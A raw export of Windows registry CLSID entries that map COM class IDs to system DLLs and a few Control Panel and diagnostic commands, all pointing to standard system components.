%SystemRoot%\System32\shwebsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ADE6444B-C91F-4E37-92A4-5BB430A33340}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AE054212-3535-4430-83ED-D501AA6680E6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AE0DB8A9-8183-4FA1-AFDA-C3506921D7E3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlidprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AE17FC35-F74E-45DB-9CCF-35193D4F7622}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\BrowserSettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AE1E00AA-3FD5-403C-8A27-2BBDC30CD0E1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hnetcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ae2079d8-d764-4d79-ab4d-3543847a1a2c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\recovery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ae31b729-d5fd-401e-af42-784074835afe}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DeviceDirectoryClient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ae4bbad2-f56a-4dfd-af17-79c03af451d0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msctfui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AE8AFD54-5B57-4961-8A9B-12ADF23B696A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmstplua.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AEB16279-B750-48f1-8586-97956060175A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfasfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AEB84C83-95DC-11D0-B7FC-B61140119C4A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmview.ocx HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AEB84C83-95DC-11D0-B7FC-B61140119C4A}\ToolboxBitmap32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmview.ocx,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AEC17CE3-A514-11D1-AFA6-00AA0024D8B6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmsynth.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AED271F2-C94A-480A-B0BC-2536590215EA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AEE2420F-D50E-405C-8784-363C582BF45A}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DevicePairingFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF02484C-A0A9-4669-9051-058AB12B9195}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\comdlg32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF2440F6-8AFC-47d0-9A7F-396A0ACFB43D}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF2AC6EE-2B16-4756-9475-F319E543EFAA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF4B1274-B78A-4979-AEF5-20E78FEE102E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF4F6510-F982-11d0-8595-00AA004CD6D8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF604EFE-8897-11D1-B944-00A0C90312E1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF65E2EA-3739-4e57-9C5F-7F43C949CE5E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF679D58-078E-48D4-A1E3-474F10DF76B8}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\cfmifsproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF95DC76-16B2-47F4-B3EA-3C31796693E7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF9F2C0D-6B9F-4e32-A94D-A3E235A31BF7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFA470FE-371D-4F98-9592-39E3C7227E5C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFB40FFD-B609-40A3-9828-F88BBE11E4E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFC00D5E-BE1D-44A2-B875-7F7BDFAB1A18}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\CfgSPPolicy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{afd198ac-5f30-4e89-a789-5ddf60a69366}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\BthRadioMedia.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} (Default) REG_EXPAND_SZ @%SystemRoot%\system32\cscui.dll,-6000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{afe7d3f2-6d6d-4c15-838f-f38c19065629}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFEE8F8B-2FE6-4382-A0DE-8D713258B95E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LicensingCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFFA1DA9-C637-4e6b-A0F3-276889D09F14}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b020b123-89b9-46c6-8509-a8bf70447fea}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tapilua.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B0210780-89CD-11d0-AF08-00A0C925CD16}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsound.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B0395DA5-6A15-4E44-9F36-9A9DC7A2F341}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B03B16C7-35A7-4A55-BEF1-8876E1CE2F45}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\pmcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b03c2205-f02e-4d77-80df-e1747afdd39c}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\execmodelproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b040ea9e-3f5e-48c9-bcdc-304e9d02851f}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sdengin2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b07a5d8d-67f8-438f-b69d-4372fbe1dbb7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CapabilityAccessHandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B07CAC5C-9786-4F8A-8DC7-902A6386F3E7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Devices.SerialCommunication.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B084785C-DDE0-4d30-8CA8-05A373E185BE}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfnetsrc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B0A2AB46-F612-4469-BEC4-7AB038BC476C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmicookr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b0a38a0c-0437-4e02-9b96-27f998020f46}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSoftwareInstallationClient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B0A8F3CF-4333-4bab-8873-1CCB1CADA48B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b0c43320-2315-44a2-b70a-0943a140a8ee}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\XpsServices.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B0DDD260-9E44-4bf2-8602-6D9CE1D0B94F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ucmhc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B0F1B174-AC86-452D-BAE7-C105F0F98C5A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmcsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B115690A-EA02-48D5-A231-E3578D2FDF80}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\IME\IMETC\IMTCTIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B11CD547-573E-4D53-8719-D55634E3F458}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b11d16d0-e195-4ca6-bbd5-1254ec098953}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B12AE898-D056-4378-A844-6D393FE37956}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,7 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B12AE898-D056-4378-A844-6D393FE37956}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b1325ef5-dd4d-4988-a2b3-c776ad45d0d6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shutdownux.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b155bdf8-02f0-451e-9a26-ae317cfd7779}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B164BCEE-41B3-4F70-A53C-2ACA322DCCCB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b1aebb5d-ead9-4476-b375-9c3ed9f32afc}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sppcext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B1E29D59-A675-11D2-8302-00C04F8EE6C0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B1EBFC28-C9BD-47A2-8D33-B948769777A7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B22C3339-87F3-4059-A0C5-037AA9707EAF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\MFMediaEngine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B2420E45-60BC-4466-AD5C-369EB092BEF8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B243A9FD-C57A-4D3E-A7CF-21CAED64CB5A}\InProcHandler32 (Default) REG_EXPAND_SZ %systemroot%\system32\CoreUIComponents.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b27b520e-46db-4720-b9c5-5f80acab23a4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b289af55-2833-44e0-a46f-96e5ebbd5c1b}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2952b16-0e07-4e5a-b993-58c52cb94cae}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2b4fb61-d2dd-4ddd-8001-20f98c6577ef}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2bcff59-a757-4b0b-a1bc-ea69981da69e}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\azroles.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B2C761C6-29BC-4f19-9251-E6195265BAF1} InfoTip REG_EXPAND_SZ @%systemroot%\system32\colorcpl.exe,-7#immutable1 LocalizedString REG_EXPAND_SZ @%systemroot%\system32\colorcpl.exe,-6#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B2D7135C-01DB-4EE1-AA28-87AC790C5D1E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\lockcontroller.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B2F2E083-84FE-4a7e-80C3-4B50D10D646E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B2F586D4-5558-49D1-A07B-3249DBBB33C2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsound.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b3179149-2b99-48b2-b44b-11aa2034c1a3}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\cngprovider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b31c57ac-4a31-470f-bbee-dba1e5b246be}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FlightSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B32D3949-ED98-4DBB-B347-17A144969BBA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B33F0D7A-1571-4022-B710-D26E9B87DEB8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B3408A2F-8DDA-1197-FBD5-2CE69A2DEFC0} (Default) REG_SZ @%systemroot%\system32\eqossnap.dll,-30001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B3408A2F-8DDA-1197-FBD5-2CE69A2DEFC0}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eqossnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B3408A2F-8DDA-1197-FBD5-2CE69A2DEFC1} (Default) REG_SZ @%systemroot%\system32\eqossnap.dll,-30001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B3408A2F-8DDA-1197-FBD5-2CE69A2DEFC1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eqossnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B3584E15-EB81-4A06-AEE4-38B4DAE71C54}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B37BF7D7-B78E-4465-98DE-71732453B03D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B3AADFEA-8404-4CBE-A62E-B0B715412C9E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WpcRefreshTask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B3FD5602-EB0F-415E-9F32-75DA391D6BF9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B3FF88A4-96EC-4CC1-983F-72BE0EBB368B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\gpsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B43A0C1E-B63F-4691-B68F-CD807A45DA01}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\TSWbPrxy.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b4414d52-69c9-4666-b62a-d82620bed434}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4463941-6512-4B2D-A54E-107DD721B4E1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\Win32AppInventoryCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b455f46e-e4af-4035-b0a4-cf18d2f6f28e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4601B57-1905-40E0-A33C-804B3AD24F2E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DiagnosticLogCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B490264C-8D8F-40FD-B1BE-CD69AD779EC1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4A6821D-4D2E-40DD-9EE0-89C2CD07BF69}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\storagewmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4B3AECB-DFD6-11d1-9DAA-00805F85CFE3}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-183 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-50688 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-1013 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\changehomegroupsettings\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\sharewithdevices\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.NetworkAndSharingCenter /page ShareMedia HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\starthomegrouptroubleshooter\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\msdt.exe -id HomegroupDiagnostic HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\viewhomegrouppassword\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup /page Passkey HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54BE40D-6E32-461A-8187-C1D35FD46580}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmgaproxystub.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54E85D9-FE23-499F-8B88-6ACEA713752B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B5607793-24AC-44c7-82E2-831726AA6CB7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b5866878-bd99-11d0-b04b-00c04fd91550}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rpcrt4.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B58ED99D-A528-4E1B-A26C-0204D5A43718}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B5965ACC-842D-4ABE-A618-9292BB3EE666}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\srloc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B5A123C0-3893-4F1C-8599-00F4B82F2C99}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fhsrchph.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b5a60a9e-a4c7-4a93-ac6e-0b76d1d87dc4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fdprint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B5C8B898-0074-459F-B700-860D4651EA14}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B5CFEB0E-9C01-4942-A5CB-F62EB09D808F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B5EBAFB9-253E-4A72-A744-0762D2685683}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B5F8FB3B-393F-4F7C-84CB-504924C2705A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msctfp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B62A910C-9FDD-4F19-9993-16DA9009A61C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B65449EC-4319-4C96-9ABD-E9257D00DB84}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\NetAdapterCim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b67c0b5e-c0ff-41c6-885d-5bdcd71837aa}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ustprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B699E5E8-67FF-4177-88B0-3684A3388BFB} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63523 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B6AFFB50-6F46-49B1-B912-C3F7A876CCCA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b6dc98b1-0bec-45e1-b2e4-3a2d943f0be4}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dpapiprovider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B6F9C8AE-EF3A-41C8-A911-37370C331DD4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\scrptadm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B6F9C8AF-EF3A-41C8-A911-37370C331DD4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\scrptadm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B6FFEC3A-07F7-42D0-8829-B722F46DB533}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WinOpcIrmProtector.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B708457E-DB61-4C55-A92F-0D4B5E9B1224}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B72F8FD8-0FAB-4dd9-BDBF-245A6CE1485B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b7373566-8ff2-45d8-af1f-da39f289bcf9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b75ac000-9bdd-11d0-852c-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b77b1cbf-e827-44a9-a33a-6ccfeeaa142a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B786ECB7-8942-4FE1-9DCD-230E30DE5AFF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B79848C3-4F26-4D9D-BF1D-81FDF2704CF8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B7BBD408-F09C-4aa8-B65E-A00B8FE0F0B9}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,7 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B7BBD408-F09C-4aa8-B65E-A00B8FE0F0B9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WofTasks.dll 